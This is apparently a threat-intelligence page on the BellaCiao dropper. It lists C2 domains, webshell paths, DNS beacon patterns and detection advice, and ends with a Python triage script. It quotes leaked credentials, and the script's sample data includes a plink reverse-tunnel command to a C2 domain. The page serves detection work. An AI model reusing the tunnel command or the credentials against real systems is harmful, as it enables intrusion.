
BellaCiao Malware Overview

BellaCiao is a sophisticated .NET-based dropper malware developed and deployed by CharmingKitten (IRGC-IO Counterintelligence Division, Department 40). The malware was first publicly analyzed by BitDefender and subsequently exposed through the release of its complete source code in Episode 3.
This analysis is based on the actual source code leaked from CharmingKitten’s internal network, providing unprecedented insight into Iranian APT malware development.

Overview

BellaCiao serves as a dropper that enables persistent access to compromised systems, primarily targeting Microsoft Exchange servers and IIS web servers. The malware comes in two distinct variants, each with different deployment mechanisms and capabilities.

Variant 1

C# webshell dropper with file upload, download, and command execution

Variant 2

PowerShell script with Plink reverse proxy and customized webserver

Malware Characteristics

Platform and Language

  • Primary Language: .NET C# (Variant 1), PowerShell (Variant 2)
  • Target Systems: Microsoft Windows Server (IIS, Exchange)
  • Persistence Mechanism: Windows Service, scheduled tasks
  • Network Communication: DNS-based C2, HTTP webserver

Attribution

BellaCiao has been definitively attributed to CharmingKitten through:
  • Complete source code recovery from internal networks
  • Infrastructure overlap with known CharmingKitten operations
  • Personnel connections documented in Episode 4
  • Correlation with publicly analyzed samples by BitDefender
The infrastructure domains and credentials exposed in this documentation may still be active. Security teams should implement blocking measures immediately.

Variant Comparison

Feature           Variant 1 (C# Dropper)              Variant 2 (PowerShell)
Deployment        Windows Service                     PowerShell script
C2 Method         DNS beaconing                       Plink reverse proxy
Webshell          ASP.NET (.aspx)                     PowerShell webserver
Target Paths      IIS wwwroot, Exchange OWA paths     Local HTTP listener
Persistence       Service installation                Scheduled task
File Operations   Upload, download, execute           Full webserver capabilities
Domains           eposta.maill-support.com,           twittsupport.com,
                  eposta.mailupdate.info              msn-center.uk

Technical Architecture

Variant 1 Architecture

Variant 2 Architecture

Known Attacks

BellaCiao has been used in confirmed attacks against:
Attack Date: 2022-2024
Details:
  • BellaCiao Variant 1 deployed to Exchange server
  • Webshell placed at Exchange OWA path
  • DNS beaconing to eposta.maill-support.com
  • Full network compromise with lateral movement
  • Credentials: Admin1@MFA, pfsenselondra@MFA
See Episode 3 Intelligence for full attack details.
Attack Date: Documented in Episode 4
Geographic Scope: Turkey, UAE, Saudi Arabia, Kuwait, Jordan
Details:
  • Part of broader ProxyShell exploitation campaign
  • 200+ targets across region
  • BellaCiao used for post-exploitation persistence
  • See Operations Targets

External Analysis

BitDefender published a comprehensive technical analysis of BellaCiao malware:

BitDefender Analysis

“Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware” - Read the full BitDefender report
The BitDefender analysis confirms:
  • Attribution to Iranian threat actors
  • Technical characteristics match leaked source code
  • Deployment patterns consistent with CharmingKitten operations
  • Infrastructure overlap with other IRGC-IO tools

Command and Control Infrastructure

Primary Domains (Variant 1)

  • eposta.maill-support.com - Primary C2 domain
  • eposta.mailupdate.info - Backup C2 domain

Secondary Domains (Variant 2)

  • twittsupport.com - Primary SSH tunnel endpoint
  • msn-center.uk - Backup SSH tunnel endpoint
See Infrastructure Domains for complete analysis.

Indicators of Compromise (IoCs)

File Paths

C:\inetpub\wwwroot\aspnet_client\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx
C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe

Service Names

  • MicrosoftAgentServices - Windows Service name for Variant 1

DNS Patterns

[A-Z]{2}[a-z]{3}EXH.eposta.maill-support.com
[A-Z]{2}[a-z]{3}EXH.eposta.mailupdate.info

Network Indicators

  • Local webserver on 127.0.0.1:49450 (Variant 2)
  • SSH tunnel credentials: -l Israel -pw Israel@123!

Detection Recommendations

1. Monitor DNS queries
   Alert on DNS queries to *.eposta.maill-support.com, *.eposta.mailupdate.info, twittsupport.com, and msn-center.uk
2. Scan web paths
   Search for unexpected ASPX files in IIS wwwroot and Exchange OWA authentication paths
3. Check for services
   Identify suspicious Windows services named MicrosoftAgentServices or similar
4. Monitor process execution
   Alert on plink.exe execution with tunnel parameters, especially listening on localhost ports
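As an added example (not code from this page, the leaked source or the BitDefender report), a small Python triage script that applies the recommendations above to constructed log records: it matches the Variant 1 beacon hostname pattern and the four C2 domains listed on this page, the MicrosoftAgentServices service name, and plink.exe command lines carrying a tunnel argument bound to a 127.0.0.1 port. The sample records, the exact plink command line and the alert labels are assumptions made for the example.

```python
import re

# Indicators quoted on this page; every log record below is a constructed sample, not real telemetry.
C2_DOMAINS = {"eposta.maill-support.com", "eposta.mailupdate.info",
              "twittsupport.com", "msn-center.uk"}
# Variant 1 beacon hostname: two upper-case letters, three lower-case letters, "EXH", then a C2 domain.
BEACON_RE = re.compile(r"^[A-Z]{2}[a-z]{3}EXH\.(eposta\.maill-support\.com|eposta\.mailupdate\.info)$")
# Variant 2: plink.exe given a -L/-R tunnel argument that names a 127.0.0.1 port (49450 on this page).
PLINK_RE = re.compile(r"(?i:plink(?:\.exe)?)\b.*\s-[LR]\s*\S*127\.0\.0\.1:\d+")
SERVICE_NAME = "microsoftagentservices"

def classify_dns(qname):
    """Label a queried name as beacon, C2 domain (any subdomain of one), or None when clean."""
    name = qname.rstrip(".")
    if BEACON_RE.match(name):
        return "bellaciao-v1-beacon"
    labels = name.lower().split(".")
    if any(".".join(labels[i:]) in C2_DOMAINS for i in range(len(labels))):
        return "bellaciao-c2-domain"
    return None

def classify_process(cmdline):
    """Label a process command line that starts plink with a localhost-bound tunnel."""
    return "bellaciao-v2-plink-tunnel" if PLINK_RE.search(cmdline) else None

def classify_service(name):
    """Label the Windows service name used by the Variant 1 dropper."""
    return "bellaciao-v1-service" if name.lower() == SERVICE_NAME else None

def scan(records):
    """Run 'kind|value' records through the check for their kind; return (label, value) hits."""
    checks = {"dns": classify_dns, "proc": classify_process, "svc": classify_service}
    hits = []
    for rec in records:
        kind, value = rec.split("|", 1)
        label = checks[kind](value)
        if label:
            hits.append((label, value))
    return hits

# Constructed sample records (hypothetical hostnames and command line, not taken from the leak).
SAMPLE = [
    "dns|ABxyzEXH.eposta.maill-support.com",
    "dns|www.microsoft.com",
    "dns|cdn.twittsupport.com.",
    "proc|C:\\Windows\\Temp\\plink.exe -ssh -R 8080:127.0.0.1:49450 user@twittsupport.com",
    "svc|MicrosoftAgentServices",
    "svc|Spooler",
]
```

`scan(SAMPLE)` returns four hits, one per malicious record; feed real DNS, Sysmon process-creation and service-installation events into the same `kind|value` shape to reuse the checks.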
